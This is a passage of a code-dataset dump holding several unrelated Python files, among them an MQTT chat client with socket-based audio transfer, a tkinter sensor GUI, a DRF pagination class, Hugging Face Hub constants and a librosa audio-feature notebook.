напрямую\")\n","sub_path":"battle_ship/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":10220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"589176738","text":"#CATC import the libraries we will use\nimport paho.mqtt.client as paho\nimport threading \nimport binascii\nimport logging\nimport time\nimport random\nimport os \nimport socket\nimport sys\nfrom datetime import datetime  # (added import) used by recibir(); may duplicate a re-export from globals\n\n\n#CATC import variables from the other programs\nfrom globals import * #CATC global variables\nfrom comandos import Comandos#CATC import the commands\nfrom prueba_encriptar import Encryptor #*****\n\n\ncomand = Comandos()\n\n\n#CATC configure the levels with logging\nLEVELS = {\n    'debug': logging.DEBUG,\n    'info': logging.INFO,\n    'warning': logging.WARNING,\n    'error': logging.ERROR,\n    'critical': logging.CRITICAL,\n}\n\n#CATC create the Mqtt class\nclass Mqtt(object):\n    #CATC initialize variables\n    def __init__(self, MQTT_USER, MQTT_PASS, MQTT_HOST, MQTT_PORT,USER_ID_1,USER_ID_2,USER_ID_3 ):\n        self.MQTT_USER = MQTT_USER\n        self.MQTT_PASS = MQTT_PASS\n        self.MQTT_HOST = MQTT_HOST\n        self.MQTT_PORT = MQTT_PORT\n        self.SERVER_ADDR = socket.gethostbyname(socket.gethostname()) \n        self.SERVER_PORT = 9816\n        self.BUFFER_SIZE = 64*1024\n        self.USER_ID_1 = USER_ID_1\n        self.USER_ID_2 = USER_ID_2\n        self.USER_ID_3 = USER_ID_3\n        \n        \n        #CATC configure the MQTT client\n\n        self.client = paho.Client(clean_session=True) \n        self.client.on_publish = self.on_publish \n        self.client.on_message = self.on_message \n        self.client.username_pw_set(self.MQTT_USER, self.MQTT_PASS) \n        self.client.connect(host=self.MQTT_HOST, port = self.MQTT_PORT) \n\n        ##CATC read the client's id\n        archivo = open(USERS_FILENAME,'r')\n        self.cod_carnet = str(archivo.readline())[0:9]\n        archivo.close()\n        #CATC read the client's group\n        archivo = open(ROOMS_FILENAME,'r')\n        self.grupo = archivo.readline(2)\n        archivo.close()\n        #CATC read the client's rooms\n        archivo = open(ROOMS_FILENAME,'r')\n        for linea in archivo.readlines():\n            #CATC subscribe the client to the topics\n            self.client.subscribe((\"salas/\"+ self.grupo +\"/\"+linea[0:len(linea)-1]),2)\n            self.client.subscribe((\"audio/\"+ self.grupo +\"/\"+linea[0:len(linea)-1]),2)\n        archivo.close()\n\n        #CATC assign some topics\n        self.topic_1 = \"comandos/\"+ str(self.grupo) + \"/\" + str(self.cod_carnet) \n        self.topic_2 = \"usuarios/16/\"+ str(self.cod_carnet)\n        self.topic_alive = \"comandos\" + \"/\" + str(self.grupo)\n        #self.topic_4 = \"usuarios/#\" #+ str(self.grupo)\n        self.topic_5 = \"audio\" + \"/\" + str(self.grupo) + \"/\" + str(self.cod_carnet)\n        \n        #CATC subscribe to the topics\n        self.client.subscribe(self.topic_1, 2) \n        self.client.subscribe(self.topic_2, 2) \n        self.client.subscribe(self.topic_5, 2) \n        self.client.loop_start()\n        self.flag_tcp = False\n    #USEOB returns the topic name\n    def topic_esp(self):\n        return str(self.topic_1) \n    #USEOB returns the keep-alive topic\n    def topicalive(self):\n        return str(self.topic_alive) \n    #USEOB returns the user's carnet (id)\n    def carnet(self):\n        return str(self.cod_carnet)\n    #USEOB returns the group number, 16\n    def room(self):\n        return str(self.grupo) \n    #USEOB returns the commands topic\n    def topic_comandos(self):\n        return str(self.topic_1) \n    #USEOB returns the user topic\n    def topic_usuarios(self):\n        return str(self.topic_2) \n    #USEOB notification for our sent messages\n    def on_publish(self, client, userdata, mid): \n        publishText = 'Publicación satisfactoria'\n        
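# (added note) paho-mqtt invokes on_publish once the broker acknowledges the message;\n        # 'mid' is the message id returned by client.publish(), useful for matching acks\n        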
#print(publishText)\n        \n    #CATC Callback executed when a message arrives on a subscribed topic\n    def on_message(self,client, userdata, msg):\n        #CATC \tAlgorithm for redirecting audio files\n        print((str(msg.payload)))\n        self.data_1= ((str(msg.payload))[6:15])\n        self.data_2= ((str(msg.payload))[0:6]+\"'\")\n        self.data_3= ((str(msg.payload))[0:6]+\"'\")\n        self.data_4= ((str(msg.payload))[0:6]+\"'\")\n        print(\"11\")\n        #CATC algorithm for receiving audio from the server\n        if(self.data_2==(str(comand.command_frr()))): \n            print(self.data_2)\n            print(((str(msg.payload))[0:6]+\"'\"))\n            print(\"22\")\n            self.recibir()\n\n        if(self.data_2==(str(comand.command_ok()))): \n            print(self.data_3)\n            self.flag_tcp = True\n            print(bool(self.flag_tcp))\n            print(\"33\")\n        \n        #USEOB if the user is disconnected\n        if(self.data_3==(str(comand.command_no()))): \n            print(self.data_4)\n            self.flag_tcp = False\n            print(\"44\")\n            logging.error('Usuario no activo')\n            run=False \n\n    #USEOB reports our TCP state\n    def tcp_a(self):\n        return bool(self.flag_tcp)\n    #USEOB function to send the files\n    def enviar(self, paquete):\n        print(\"enviar\")\n        self.filename = paquete\n        sock = socket.socket()\n        sock.bind((self.SERVER_ADDR, self.SERVER_PORT))\n        sock.listen(10) # #USEOB 1 active connection and 9 queued\n        run = True\n        try:\n            while run: \n                print(\"\\nEsperando conexion remota...\\n\")\n                conn, addr = sock.accept()\n                opcionMenu = input('\\n\\t presione el #3 -> ') \n                if(opcionMenu == \"salir\"):\n                    run = False\n                with open(self.filename, 'rb') as f: #USEOB open the file to send in BINARY mode\n                    conn.sendfile(f, 0)\n                    f.close()\n                    run = False\n            \n        except KeyboardInterrupt:#USEOB disconnects us\n            print('Desconectando del broker MQTT...')\n            sock.close() \n\n        finally: #USEOB closes the program\n            sock.close() \n\n    #CATC audio reception\n    def recibir(self):\n        print(\"recibir\")\n        now = datetime.now()\n        self.arch_audio=str(datetime.timestamp(now))+\".wav\"\n        sock=socket.socket()\n        sock.connect_ex((self.SERVER_ADDR,self.SERVER_PORT))\n        try:\n            buff = sock.recv(self.BUFFER_SIZE)\n            file_to_open = os.path.expanduser(self.arch_audio) # (fixed) was the quoted literal 'self.arch_audio'\n            f = open(file_to_open, 'wb+') #USEOB the incoming file is saved here\n\n            while buff:\n                f.write(buff)\n                buff = sock.recv(self.BUFFER_SIZE) #USEOB the blocks are appended to the file\n            f.close() #USEOB close the file\n            print(\"Recepcion de archivo finalizada\")\n            \n        except KeyboardInterrupt:\n            print('Desconectando del broker MQTT...')\n            sock.close()\n\n        finally:\n            print(\"Cerrando el servidor...\")\n            sock.close() \n        \n    #USEOB the main menu\n    def mainMenu(self): \n        #os.system('clear') \n        print ('Menú principal')\n        print ('\\t1 - Enviar texto')\n        print ('\\t2 - Enviar mensaje de voz')\n        print ('\\t3 - Salir')\n        \n        \n    #USEOB selection menu\n    def typeMenu(self): \n        #os.system('clear') \n        print ('Seleccione una opcion')\n        print ('\\t1 - Enviar a usuario')\n        print ('\\t2 - Enviar a sala')\n\n    #USEOB user menu\n    def userMenu(self): \n        #os.system('clear') \n        print ('Seleccione Seleccione un usuario')\n        print ('\\t1 -'+ USER_ID_2)\n        print ('\\t2 -'+ USER_ID_3)\n        \n    #USEOB room menu\n    def roomMenu(self): \n        #os.system('clear') \n        print ('Seleccione Sala')\n        print ('\\t0 - S00')\n        print ('\\t1 - S01')\n        print ('\\t2 - S02')\n        print ('\\t3 - S03')\n\n    #CATC function to send a message to a user\n    def sendTextUser(self,num):\n        #os.system('clear')\n        #CATC pick the destination user\n        self.num = num \n        if num == 1:\n            UX = USER_ID_2\n        else:\n            UX = USER_ID_3 
\n\n a_enviar = input ('Escribe mensaje ->')\n a_enviar = \"A llegado un mensaje a USUARIO \" +str(UX)+\" ->-> \"+self.USER_ID_1 + ' dice: ' + a_enviar\n self.client.publish(('usuarios/16/' +str(UX)), a_enviar)\n print('...enviado') \n #CATC funcion para enviar mensaje a un salas\n def sendTextRoom(self,num):\n #os.system('clear')\n self.num=num \n a_enviar = input ('Escribe mensaje ->')\n a_enviar = \"A llegado un mensaje a SALA 16S0\"+ str(num)+\" ->-> \"+self.USER_ID_1 + ' dice: ' + a_enviar\n self.client.publish((\"salas/16/16S0\"+ str(num)), a_enviar )\n print('...enviado') \n \n #USEOB funcion para encriptar texto \n def encrip_texto(self): \n f2 = open('Texto_a_encriptar.txt','r')\n f2_a = f2.read()\n f2.close()\n f3 = open('Texto_encriptado.txt','w')\n f3.write(f2_a)\n f3.close()\n self.enc.encrypt_file('Texto_encriptado.txt')\n\n #USEOB funcio pra encriptar audio \n def encrip_audio(self):\n aud = open('output.wav','rb')\n audi = aud.read()\n aud.close()\n audio_copia = open('Audio_encriptado.wav','wb')\n audio_copia.write(audi)\n audio_copia.close()\n self.enc.encrypt_file('Audio_encriptado.wav')\n\n #USEOB funcion para desecriptar texto\n def descrip_texto(self):\n des = open('In_texto.txt.enc','rb')\n info = des.read()\n des.close()\n des2 =open('In_tex_decrypt.txt.enc','wb')\n des2.write(info)\n des2.close()\n self.enc.decrypt_file('In_tex_decrypt.txt.enc')\n\n #USEOB funcion para desencriptar audio \n def descrypt_wav(self):\n des = open('In_Audio_encriptado.wav.enc','rb')\n info = des.read()\n des.close()\n des2 =open('In_Audio_decryp.wav.enc','wb')\n des2.write(info)\n des2.close()\n #descrypr = open('In_Audio_decryp.wav.enc','wb')\n #descrypt.write(wavdata)\n #descrypr.close()\n self.enc.decrypt_file('In_Audio_decryp.wav.enc')\n #self.enc.decrypt_file('In_Audio_encriptado.wav.enc')\n print('termino de hacer el decrypt')\n #ogging.info('inicia reproduccion de audio:') #USEOB COLOCAMOS LA INFO EN EL LOG\n #os.system('aplay In_Audio_decryp.wav') #USEOB REPRODUCIMOS\n \n \n \n \n ","sub_path":"Final/cliente/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":10569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"407572737","text":"from sys import stdin , stdout\ndef isPrime(N):\n if N == 1:\n return True\n for i in range(2,int(N**(1/2))):\n if N%i == 0:\n return False\n return True\ndef constructTree(no):\n lno = int(no/10)\n rno = int(str(no)[1:])\n lnodeweight , rnodeweight = None , None \n if lno in [2,3,5,7]:\n lnodeweight = -1\n rnodeweight = -1\n return 1\n if isPrime(lno):\n lnodeweight = -1\n else:\n lnodeweight = constructTree(lno)\n if isPrime(rno):\n rnodeweight = -1\n else:\n rnodeweight = constructTree(rno)\n \n if (lnodeweight + rnodeweight) == -2:\n return 1\n else:\n return -1\ndef main():\n \n N = int(stdin.readline())\n for _ in range(N):\n no = int(stdin.readline())\n if constructTree(no) == -1:\n stdout.write(\"Alice\\n\")\n else:\n stdout.write(\"Bob\\n\")\nmain()","sub_path":"PrimeGame.py","file_name":"PrimeGame.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"199383085","text":"from collections import OrderedDict\n\nfrom rest_framework import pagination\nfrom rest_framework.response import Response\n\n\nclass BasePagination(pagination.PageNumberPagination):\n page_size = 20\n page_size_query_param = 'page_size'\n max_page_size = 500\n\n def get_paginated_response(self, data, *args, 
**kwargs):\n request = kwargs.get('request')\n\n if request:\n self.page_size = self.get_page_size(request)\n if hasattr(self, 'request'):\n self.page_size = self.get_page_size(self.request)\n\n return Response(OrderedDict([\n ('next', self.get_next_link()),\n ('page', self.page.number),\n ('page_size', self.page_size),\n (\"pages\", self.page.paginator.num_pages),\n ('previous', self.get_previous_link()),\n ('count', self.page.paginator.count),\n ('results', data)\n ]))\n","sub_path":"src/favorite_things/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"398532098","text":"command = \"cmd.exe /C dir C:\\\\\"\nimport os\nimport tkinter\n#os.system('ipconfig')\ncmd_text = os.popen('ipconfig').read()\nfinaltext = ''\nfor line in cmd_text.splitlines():\n templine = line.replace(\" \", \"\")\n #print(\"qqqqqqqqq\")\n #print(templine)\n #print(\"wwwwwwww\")\n if((\"Media\") in line):\n newline = line[line.find(':') + 2:]\n print(newline)\n finaltext = finaltext + newline + os.linesep\n print(\"ooo\")\n #ooo = re.sub(r'^.*?I', 'I', line)\n #tempint = index\n #temptempline = line[index(\":\"):]\nfrom tkinter import *\nwindow=Tk()\nlbl=Label(window, text=\"This is Label widget\", fg='red', font=(\"Helvetica\", 16))\nlbl.place(x=60, y=50)\nwindow.title('Hello Python')\nlbl2=Label(window, text=finaltext, fg='black', font=(\"Helvetica\", 16))\nlbl2.place(x=60, y=50)\ndef refresh():\n tkinter.Message( \"Hello Python\", \"Hello World\")\nbtn=Button(window, text=\"Refresh\", fg='black', command= refresh)\nbtn.place(x=80, y=100)\nwindow.geometry(\"300x200+10+10\")\nwindow.mainloop()\n #print(\"x\")\n #lineResult = libLAPFF.parseLine(line)\nprint(\"bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb\")\n#print(a)\nprint(\"cccccccccccccccccccccccccccc\")\n#print(type(a))\n#print((a))","sub_path":"Licsesnse.py","file_name":"Licsesnse.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"610726627","text":"import os\n\n\n# Constants for file downloads\n\nPYTORCH_WEIGHTS_NAME = \"pytorch_model.bin\"\nTF2_WEIGHTS_NAME = \"tf_model.h5\"\nTF_WEIGHTS_NAME = \"model.ckpt\"\nFLAX_WEIGHTS_NAME = \"flax_model.msgpack\"\nCONFIG_NAME = \"config.json\"\n\nHUGGINGFACE_CO_URL_HOME = \"https://huggingface.co/\"\n\nHUGGINGFACE_CO_URL_TEMPLATE = (\n \"https://huggingface.co/{repo_id}/resolve/{revision}/{filename}\"\n)\n\nREPO_TYPE_DATASET = \"dataset\"\nREPO_TYPES = [None, REPO_TYPE_DATASET]\n\nREPO_TYPE_DATASET_URL_PREFIX = \"datasets/\"\n\n\n# default cache\nhf_cache_home = os.path.expanduser(\n os.getenv(\n \"HF_HOME\", os.path.join(os.getenv(\"XDG_CACHE_HOME\", \"~/.cache\"), \"huggingface\")\n )\n)\ndefault_cache_path = os.path.join(hf_cache_home, \"hub\")\n\nHUGGINGFACE_HUB_CACHE = os.getenv(\"HUGGINGFACE_HUB_CACHE\", default_cache_path)\n","sub_path":"src/huggingface_hub/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"177666631","text":"from buildSenti import buildSenti\nfrom math import sqrt\n\nclass Method:\n def isValid(self, w):\n return True\n\n def langFeatures(self, rev):\n pos = 0\n neg = 0\n for section in rev:\n for word in section.words():\n sent = self.senti.get(word, (0, 0)) \n pos += sent[0]\n neg += sent[1]\n return {'pos': pos, 'neg': neg}\n\n def 
test(self, rev):\n output = self.classifier.classify(self.langFeatures(rev))\n return float(output)\n\n def __init__(self, corpus):\n self.ml = 2\n self.senti = buildSenti()\n self.classifier = corpus.buildRevClassifier(self.langFeatures, 100000, self.isValid)\n self.classifier.show_most_informative_features(5)\n","sub_path":"attempts/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"415413797","text":"# ※ Implementing a queue with a list\n# A queue is a First In First Out data structure, also known as a waiting line.\n# In a queue, the data that goes in first comes out first.\n\n# - Source code\nqueue=[]\nb=0\nwhile b < 10 :\n queue.append(input())\n b += 1\nc=len(queue)\nwhile True:\n print(queue[0])\n queue.pop(0)\n c-=1\n if c==0:\n break\n \nprint(queue)\n \n# Create an empty queue list and fill it using a while loop.\n# Numbers are read into the queue list with .append and the list size is measured with len();\n# then, for First In First Out, the first element of the list is printed and removed right away.\n# Once every number in the list has been printed, the list is left empty.\n# The output likewise shows FIFO order.","sub_path":"list.queue.py","file_name":"list.queue.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"489440684","text":"import numpy as np\nfrom . import classifier\n\n\nclass Inspector(object):\n\n DETERMINANT_EPS = 1e-30\n\n def __init__(self, sample, feature_subset):\n self.pearson = [None]\n self.weights = [None]\n self.functional = None\n\n self.sample = sample\n self.feature_subset = feature_subset\n self.n_features = len(feature_subset)\n self.feature_mapping = {sub: idx for (idx, sub)\n in enumerate(self.feature_subset)}\n self.sample_subset = np.nonzero(\n ~np.isnan(self.sample.X[:, feature_subset]).any(axis=1))\n if type(self.sample_subset) is tuple:\n self.sample_subset = self.sample_subset[0]\n self.sample_mapping = {sub: idx for (idx, sub)\n in enumerate(self.sample_subset)}\n self.n_samples = len(self.sample_subset)\n\n # train totally\n self.clf = classifier.Classifier(sample, self.feature_subset,\n self.sample_subset)\n subC = sample.y[self.sample_subset][:, np.newaxis]\n values = self.clf.classify_one(\n range(len(self.feature_subset)),\n sample.X[self.sample_subset, :][:, self.feature_subset])\n\n # get stats\n self.expecteds = values.mean(axis=0)\n self.errors = np.square(values - subC).mean(axis=0)\n self.variances = np.square(values - self.expecteds).mean(axis=0)\n self.discrepancies = np.zeros((self.n_features, self.n_features))\n\n tmp = np.square(values).sum(axis=0)[np.newaxis]\n self.discrepancies = tmp + tmp.T - 2 * np.dot(values.T, values)\n self.discrepancies /= self.n_samples\n\n self.eC = np.nanmean(subC)\n self.varC = np.square(np.nanstd(subC)).mean()\n self.pearson = np.zeros(self.n_features)\n # pearson = [self.pearson(k, values) for in xrange(self.n_features)]\n e1, e2 = self.expecteds[np.newaxis], self.eC\n v1, v2 = self.variances, self.varC\n self.pearson = np.dot(\n (self.sample.y[self.sample_subset] - e2)[np.newaxis], values - e1)\\\n / (self.n_samples * np.sqrt(v1 * v2))\n\n def get_expected_val(self, values):\n return np.nanmean(values)\n\n def get_expected_f(self, feature):\n return self.expecteds[feature]\n\n def get_w_expected(self, weights):\n return self.clf.classify(self.sample.X).mean()\n\n def get_variance_feature(self, feature):\n return self.variances[feature]\n\n def get_variance_values(self, values):\n return np.nanstd(values).mean() ** 2\n\n def pearson(self, feature, values):\n # todo: checks\n e1, e2 = 
self.get_expected_f(feature), self.eC\n v1, v2 = self.get_variance_feature(feature), self.varC\n return np.inner(\n values[:, feature] - e1, self.sample.y[self.sample_subset] - e2)\\\n / (self.n_samples * np.sqrt(v1 * v2))\n\n def check(self):\n if len(self.feature_subset) > 1:\n try:\n if np.abs(np.linalg.det(self.discrepancies))\\\n < self.DETERMINANT_EPS:\n return False\n revrsd = np.linalg.inv(self.discrepancies)\n except np.linalg.LinAlgError:\n # print np.linalg.LinAlgError.__name__, ' got:',\\\n # '\\nfeature_subset:', self.feature_subset,\\\n # '\\ndiscrepancies:\\n', self.discrepancies\n return False\n\n check_ = self.subset_weights(revrsd)\n if check_ is None:\n return False\n self.weights, self.functional = check_\n return True\n else:\n self.weights = np.array([1])\n self.functional = self.pearson[0][0]\n return True\n\n def which_is_dominated_clf(self, clf1, clf2):\n v1, v2 = clf1.variance, clf2.variance\n rho = np.square(clf1.classify_training - clf2.classify_training).mean()\n if (np.square(v1 - v2) - rho * (v1 + v2)) == 0:\n return None # TODO: what to do?\n c1 = (v2 * v2 - v1 * v2 - v2 * rho)\\\n / (np.square(v1 - v2) - rho * (v1 + v2))\n if c1 < 0:\n return clf1\n elif c1 > 1:\n return clf2\n return None\n\n def which_is_dominated_feature(self, feature1, feature2):\n if self.discrepancies[feature1][feature2] <\\\n np.abs(self.errors[feature1], self.errors[feature2]):\n return feature1 if self.errors[feature1] >\\\n self.errors[feature2] else feature2\n else:\n return None\n\n\nclass MaxCorrelationInspector(Inspector):\n _epsilon = 1e-3\n single_functional_description = 'pearson'\n complex_functional_description = 'pearson'\n\n def __init__(self, sample, feature_subset):\n super(MaxCorrelationInspector, self).__init__(sample, feature_subset)\n self.alpha, self.beta, self.gamma = [np.double() for x in xrange(3)]\n self.cs = np.double()\n self.B0, self.B1, self.B2 = [None for x in xrange(3)]\n self.sample, self.subset = sample, feature_subset\n\n def subset_weights(self, reversed_):\n subsize = len(self.feature_subset)\n weights = [np.double() for x in xrange(subsize)]\n functional = None\n varC = self.varC\n discrepancies = self.discrepancies\n variances = self.variances\n\n if subsize == 2:\n v1, v2 = variances\n rho = discrepancies[0, 1]\n if (np.square(v1 - v2) - rho * (v1 + v2) == 0):\n return None # TODO ???\n c1 = (v2 * v2 - v1 * v2 - v2 * rho) /\\\n ((v1 - v2) * (v1 - v2) - rho * (v1 + v2))\n if not 0 <= c1 <= 1:\n return None\n weights = [c1, 1 - c1]\n functional = (c1 * (v1 - v2) + v2) /\\\n np.sqrt((c1 * (v1 - v2) + v2 - c1 * (1 - c1) * rho) * varC)\n # theta = -2*v1*v2*rho / ((v1-v2)**2 - rho * (v1+v2))\n # functional = (theta/sqrt(varC)) /\\\n # np.sqrt(theta + rho * (theta-v2) * (theta-v1) / (v1-v2) ** 2)\n else:\n # phi = lambda idx: beta * PSI[i] - gamma * PHI[i]\n # psi = lambda idx: beta * PHI[i] - alpha * PSI[i]\n PSI = np.sum(reversed_, axis=1) # refers to PSI in article\n PHI = reversed_.dot(variances) # refers to PHI in article\n\n self.alpha = alpha = np.inner(variances, PHI)\n self.beta = beta = np.sum(PHI)\n self.gamma = gamma = np.sum(PSI)\n\n cs = beta * beta - alpha * gamma\n\n # bounds\n if cs == 0:\n return None\n phi_ = beta * PSI - gamma * PHI # refers to Gamma1/cs\n psi_ = beta * PHI - alpha * PSI # refers to Gamma0/cs\n val = -psi_ / phi_\n div = phi_\n if cs > 0:\n left = val[div > 0].max() if (div > 0).any() else -np.inf\n right = val[div < 0].min() if (div < 0).any() else +np.inf\n else:\n left = val[div < 0].max() if (div < 0).any() else 
-np.inf\n right = val[div > 0].min() if (div > 0).any() else +np.inf\n if left > right:\n return None\n\n B0, B1, B2 = 0, 0, 0\n norm_by = 2 * cs * cs\n B0 = psi_.dot(discrepancies).dot(psi_) / norm_by\n B2 = phi_.dot(discrepancies).dot(phi_) / norm_by\n B1 = (psi_.dot(discrepancies).dot(phi_) +\n phi_.dot(discrepancies).dot(psi_)) / norm_by\n self.B0, self.B1, self.B2 = B0, B1, B2\n\n def corr(theta):\n Q_2 = B0 + B1 * theta + B2 * theta * theta\n return theta / np.sqrt(varC * (theta - Q_2))\n\n theta = (2 * B0) / (1 - B1)\n\n functional = 0\n best_theta = None\n\n # check borders\n for testK, val in ((corr(val), val) for val in (left, right)):\n if testK > functional:\n functional, best_theta = testK, val\n\n # check range\n if left < theta < right:\n testK = corr(theta)\n if testK > functional:\n functional, best_theta = testK, theta\n\n if best_theta is None:\n return None\n\n weights = best_theta * phi_ / cs + psi_ / cs\n if (weights <= self._epsilon).any():\n return None\n\n return weights, functional\n","sub_path":"inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"632209225","text":"import tkinter as tk\r\n\r\n\r\nwindow = tk.Tk()\r\nwindow.geometry(\"700x600\")\r\nwindow.title(\"Done Interface\")\r\nfont_specs = ('ubuntu', 13)\r\n\r\ndef setting():\r\n window_setting = tk.Tk()\r\n window_setting.geometry(\"500x500\")\r\n window_setting.title(\"Setting\")\r\n window_setting.resizable(False, False)\r\n\r\ndef flame_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Flame Sensor\")\r\n\r\ndef temperature_humidity_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Temperature and Humidity Sensor\")\r\n\r\ndef connection():\r\n text = \"Connection Successful\"\r\n text_output = tk.Label(window, text = text)\r\n text_output.grid(row=0, column=1)\r\n\r\ndef gas_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Gas Sensor\")\r\n\r\ndef vibration_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Vibration Sensor\")\r\n\r\ndef pressure_temperature_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Pressure and Temperature Sensor\")\r\n\r\nmenubar = tk.Menu(window, font=font_specs, bd=1, bg=\"grey\")\r\nwindow.config(menu=menubar)\r\n\r\nfile_save = tk.Menu(menubar, font=font_specs, tearoff=0)\r\nfile_save.add_command(label=\"Save\")\r\nfile_save.add_command(label=\"New window\")\r\nfile_save.add_command(label=\"Close window\")\r\nfile_save.add_command(label=\"Setting\", command=setting)\r\nsensor_set = tk.Menu(menubar, font=font_specs, tearoff=0)\r\nsensor_set.add_command(label=\"flame sensor\")\r\nsensor_set.add_command(label=\"Temperature and Humidity senor\")\r\nsensor_set.add_command(label=\"Gas sensor\")\r\nsensor_set.add_command(label=\"Vibration sensor\")\r\nsensor_set.add_command(label=\"Pressure and temperature sensor\")\r\n\r\n\r\nmenubar.add_cascade(label=\"File\", menu=file_save)\r\nmenubar.add_cascade(label=\"Sensor\", menu=sensor_set)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n window.mainloop()\r\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 
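The gui.py record above defines handler functions (setting, flame_sensor, gas_sensor, and so on) but wires only the Setting entry through command=, and every handler opens a second tk.Tk() root. A minimal hedged sketch of the conventional tkinter pattern, with one root window, Toplevel children, and each menu entry bound to its callback; the widget and function names below are illustrative, not taken from the record:

import tkinter as tk

root = tk.Tk()  # a tkinter process should own exactly one Tk root

def open_sensor_window(title):
    # child windows are Toplevel instances that share the root's mainloop
    win = tk.Toplevel(root)
    win.title(title)

menubar = tk.Menu(root)
sensor_menu = tk.Menu(menubar, tearoff=0)
# bind each handler at creation time via command=; each lambda captures its own title
sensor_menu.add_command(label="flame sensor",
                        command=lambda: open_sensor_window("Flame Sensor"))
sensor_menu.add_command(label="Gas sensor",
                        command=lambda: open_sensor_window("Gas Sensor"))
menubar.add_cascade(label="Sensor", menu=sensor_menu)
root.config(menu=menubar)
root.mainloop()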
+{"seq_id":"286645834","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.4.2\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# !pip install librosa\n# !apt-get install libsndfile1 -y\n\n# + _uuid=\"8f2839f25d086af736a60e9eeb907d3b93b6e0e5\" _cell_guid=\"b1076dfc-b9ad-4769-8c92-a6c4dae69d19\"\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n#import IPython.display as ipd # to display audio inside jupyter\nimport librosa # Audio parsing\nimport librosa.display\nimport matplotlib.pyplot as plt # to make graphs\n#import sklearn # Ml\nfrom tqdm import tqdm_notebook as tqdm # progress bar\nimport multiprocessing # going faster\nfrom multiprocessing import Pool\nimport time\nimport random\nfrom pathlib import Path\n\n# Input data files are available in the read-only \"../input/\" directory\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\n\n\n# You can write up to 5GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using \"Save & Run All\" \n# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session\n\n# + _uuid=\"d629ff2d2480ee46fbb7e2d37f6b5fab8052498a\" _cell_guid=\"79c7e3d0-c299-4dcb-8224-4455121ee9b0\"\ndef f_path(fileName, tpe = None):\n \"\"\"\n Adds full path to a filename recived\n tpe = None / validation / train / test\n \"\"\"\n if tpe == None:\n return \"ml-fmi-23-2020/\" + fileName\n else:\n return \"ml-fmi-23-2020/\" + tpe + \"/\" + tpe + \"/\" + fileName\n \ndef split_into_files(file):\n \"\"\"\n Splits the recived input into files\n \"\"\"\n file = file.split(\"\\n\")\n file = [x.split(\",\") for x in file]\n return file\n# Reading the file names\nwith open(f_path(\"train.txt\"), \"r\") as f:\n trainFileNames = split_into_files(f.read())\nwith open(f_path(\"validation.txt\"), \"r\") as f:\n validationFileNames = split_into_files(f.read())\nwith open(f_path(\"test.txt\"), \"r\") as f:\n testFileNames = split_into_files(f.read())\n# -\n\n#Lisen to a file\nfileIndex = 100\ncurentFilePath = f_path(trainFileNames[fileIndex][0], \"train\")\nprint(trainFileNames[fileIndex][1])\n#ipd.Audio(curentFilePath)\n\n\ndef display_waveform(path):\n y, sr = librosa.load(curentFilePath, duration=10)\n plt.figure()\n plt.subplot(3, 1, 1)\n librosa.display.waveplot(y, sr=sr)\ndef display_colorbar(path):\n wave , sr = librosa.load(path)\n st = librosa.stft(wave)\n srD = librosa.amplitude_to_db(abs(st))\n plt.figure(figsize=(20, 5))\n librosa.display.specshow(srD, sr=sr, x_axis='time', y_axis='hz') \n plt.colorbar()\n\n\n# +\ndef spectral_centroids(path):\n # spectral centroids\n # weighter mean of the frequencies\n wave , sr = librosa.load(path)\n spectral_centroids = librosa.feature.spectral_centroid(wave, sr=sr)[0]\n return np.array(spectral_centroids)\n\ndef mfcc(path):\n wave, sr = librosa.load(path)\n mfccs = librosa.feature.mfcc(wave, sr=sr)\n return mfccs\n\n\n# -\n\ndef load_file(path):\n y, sr = librosa.load(path)\n return (path, y, sr)\ndef load_file_list(path_list):\n p = 
